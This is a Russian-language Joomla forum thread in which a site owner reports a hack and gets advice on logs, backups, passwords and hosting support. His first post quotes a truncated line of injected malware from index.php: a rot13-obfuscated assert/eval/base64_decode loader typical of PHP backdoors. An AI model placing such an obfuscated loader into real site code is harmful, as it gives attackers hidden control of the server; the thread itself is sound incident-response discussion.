Форум русской поддержки Joomla!® CMS
11.12.2016, 15:55:43 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

И меня взломали

 (Прочитано 952 раз)
0 Пользователей и 1 Гость смотрят эту тему.
Aleksey-01
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« : 16.05.2015, 17:41:13 »

Добрый день.

Присоединился к взломанным Sad
Подскажите, с чего начать?
В индексе вот такой код


Код:
@assert(str_rot13('riny(onfr64_qrpbqr("nJLt.....=="));'));

В данную минуту айболитом сканирую
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2659


step by step


« Ответ #1 : 16.05.2015, 17:59:27 »

Проверить установленные расширения на обновления. И хотя бы написать версию Joomla в сообщении
Записан
Aleksey-01
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #2 : 16.05.2015, 18:44:22 »

Первое
Все сайты закрыл на хостинге
Второе
Версия 3.4 последняя
Недавно установил обновления
Третье
Почти везде в index.php есть вредоносный код.
Естественно удалять, все чистить.
Проблема в том, что нужно понять откуда проникли.
Записан
flyingspook
Moderator
*****

Репутация: +226/-9
Offline Offline

Сообщений: 3540


« Ответ #3 : 16.05.2015, 18:57:12 »

Проблема в том, что нужно понять откуда проникли.
Так для этого логи и существуют.
Записан
ChaosHead
Профи
********

Репутация: +382/-10
Offline Offline

Пол: Мужской
Сообщений: 4398



« Ответ #4 : 16.05.2015, 18:58:52 »

Если у хостинга есть резервные копии, то откати на версию до взлома и дальше смени пароли от ftp и т.д. А потом просмотри какие сторонние компоненты есть и как они актуальны.
Записан
Aleksey-01
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #5 : 16.05.2015, 19:34:24 »

К сожалению только лечение... поздно Sad
На что обратить внимание в логах?
Записан
winstrool
Завсегдатай
*****

Репутация: +39/-2
Offline Offline

Пол: Мужской
Сообщений: 727


Свободен для работы


« Ответ #6 : 16.05.2015, 23:46:41 »

печально что логов нет((( ищи тогда запросы к БД и смотри какие параметры не фильтруются, также смотри какие функции потенциально под evаl таrже не фильтруются от сторонних запросов!
Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #7 : 17.05.2015, 09:43:44 »

ваш хостинг обязан предоставить их логи, не джумловские и не вашего аккаунта, если хост адекватный.
и есть ещё хосты, которые сами что-то врезают, а потом требуют деньги за анализ и помощь.
и тех поддержка обязана логи выслать, это у них по умолчанию в обязанностях по требованию, как то читал договоры про права потребителя покупки хоста или домена в нём.
короче, стучите в тех поддержку, это их косяк, что к вам код проник, они могут отморозится, но хотябы вернут и исправят до нужного бекапа.

***
ну или вы уже както код меняли на уязвимость и к вам залезли, тогда уже не хоста косяк.но хост логи дать обязан.мой всегда даёт вплоть до ип адресов до секунды.
« Последнее редактирование: 17.05.2015, 09:51:41 от vipiusss » Записан
Aleksey-01
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #8 : 17.05.2015, 11:36:20 »

Хотя, вот что нашел айболит:
AFD : MINIFY : CVE-2013-6619
Это угроза DLE... а у меня Joomla...
« Последнее редактирование: 17.05.2015, 11:51:32 от Aleksey-01 » Записан
vipiusss
Профи
********

Репутация: +261/-8
Offline Offline

Пол: Мужской
Сообщений: 4573


Skype: renor_


« Ответ #9 : 17.05.2015, 12:13:11 »

я айболит не юзал, не подскажу, что он у вас нашёл.я перед тем, как чтото ставить, код весь проверяю, как могу.
и ДЛЕ я не юзал(если я не ошибся, что ДЛЕ вы про движок)
*** хосту пишите в техподдержку, почему не хотите? я бы их напряг.
Записан
Aleksey-01
Новичок
*

Репутация: +0/-0
Offline Offline

Сообщений: 5


« Ответ #10 : 17.05.2015, 12:25:40 »

Написал, жду ответа.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet